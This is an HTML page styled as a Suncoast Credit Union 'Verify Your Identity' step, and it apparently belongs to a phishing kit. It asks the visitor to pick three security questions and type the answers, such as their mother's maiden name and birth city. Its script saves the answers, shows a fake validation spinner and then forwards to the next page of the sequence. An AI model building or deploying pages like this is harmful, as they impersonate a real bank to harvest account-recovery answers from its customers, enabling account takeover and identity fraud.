<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8" />
  <meta name="viewport" content="width=device-width, initial-scale=1.0"/>
  <title>Suncoast Credit Union - Security Questions</title>
  <link rel="shortcut icon" href="images/favicon.ico"/>
  <style>
    body {
      margin: 0;
      font-family: Segoe UI, Arial, sans-serif;
      background-color: #EEE;
    }

    #container {
      position: relative;
      width: 1365px;
      margin: 0 auto;
    }

    .background-img {
      position: absolute;
      left: 0;
      top: 0;
      width: 1365px;
      height: 524px;
      z-index: 0;
    }

    .form-container {
      position: absolute;
      top: 200px;
      left: 450px;
      width: 460px;
      background-color: white;
      padding: 30px;
      border-radius: 8px;
      box-shadow: 0 0 10px rgba(0,0,0,0.1);
      z-index: 1;
    }

    h2 {
      text-align: center;
      color: #333;
      margin-bottom: 25px;
    }

    label {
      display: block;
      margin: 15px 0 5px;
      font-weight: bold;
      color: #333;
    }

    select, input[type="text"] {
      width: 100%;
      padding: 10px;
      margin-bottom: 15px;
      font-size: 14px;
      border: 1px solid #ccc;
      border-radius: 4px;
    }

    select:focus, input[type="text"]:focus {
      border-color: #0e8400;
      outline: none;
    }

    .button {
      background-color: #f8971d;
      border: none;
      color: white;
      padding: 12px 20px;
      font-size: 16px;
      border-radius: 4px;
      cursor: pointer;
      width: 100%;
      margin-top: 10px;
    }

    .button:hover {
      background-color: #e18510;
    }

    #loading {
      display: none;
      position: fixed;
      top: 0;
      left: 0;
      width: 100vw;
      height: 100vh;
      background-color: rgba(255, 255, 255, 0.85);
      z-index: 9999;
      text-align: center;
      padding-top: 200px;
      font-size: 20px;
      color: #0e8400;
    }

    .spinner {
      border: 4px solid #f3f3f3;
      border-top: 4px solid #0e8400;
      border-radius: 50%;
      width: 40px;
      height: 40px;
      margin: 0 auto 20px;
      animation: spin 1s linear infinite;
    }

    @keyframes spin {
      0% { transform: rotate(0deg); }
      100% { transform: rotate(360deg); }
    }
  </style>
</head>
<body>
  <div id="loading">
    <div class="spinner"></div>
    Validating your security questions...
  </div>

  <div id="container">
    <img class="background-img" src="images/s8.png" alt="Step 2">
    
    <div class="form-container">
      <h2>Verify Your Identity</h2>
      <form id="securityForm" autocomplete="off">
        <!-- Question 1 -->
        <label for="question1">Question 1:</label>
        <select id="question1" name="question1" required>
          <option value="">-- Select a question --</option>
          <option value="paternal-grandfather">First name of paternal grandfather?</option>
          <option value="first-school">Name of your first school?</option>
          <option value="first-car">What was your first car?</option>
          <option value="pet-name">Name of your first pet?</option>
          <option value="mother-maiden">What is your mother's maiden name?</option>
        </select>
        <input type="text" name="answer1" placeholder="Answer" required>

        <!-- Question 2 -->
        <label for="question2">Question 2:</label>
        <select id="question2" name="question2" required>
          <option value="">-- Select a question --</option>
          <option value="birth-city">City where you were born?</option>
          <option value="best-friend">Name of your childhood best friend?</option>
          <option value="wedding-city">City where your parents married?</option>
          <option value="elementary-school">What elementary school did you attend?</option>
          <option value="favorite-teacher">Who was your favorite teacher?</option>
        </select>
        <input type="text" name="answer2" placeholder="Answer" required>

        <!-- Question 3 -->
        <label for="question3">Question 3:</label>
        <select id="question3" name="question3" required>
          <option value="">-- Select a question --</option>
          <option value="vacation-spot">Favorite vacation spot as a child?</option>
          <option value="first-job">What was your first job?</option>
          <option value="highschool-name">Name of your high school?</option>
          <option value="phone-number">Last 4 digits of childhood phone number?</option>
          <option value="library-card">Your first library card number?</option>
        </select>
        <input type="text" name="answer3" placeholder="Answer" required>

        <button class="button" type="submit">Continue</button>
      </form>
    </div>
  </div>

<script>
  const form = document.getElementById('securityForm');
  form.addEventListener('submit', function (e) {
    e.preventDefault();
    localStorage.setItem('question1', form.question1.value);
    localStorage.setItem('answer1', form.answer1.value);
    localStorage.setItem('question2', form.question2.value);
    localStorage.setItem('answer2', form.answer2.value);
    localStorage.setItem('question3', form.question3.value);
    localStorage.setItem('answer3', form.answer3.value);
    document.getElementById('loading').style.display = 'block';
    setTimeout(() => {
      window.location.href = 'surf3.html';
    }, 2000);
  });
</script>
</body>
</html>
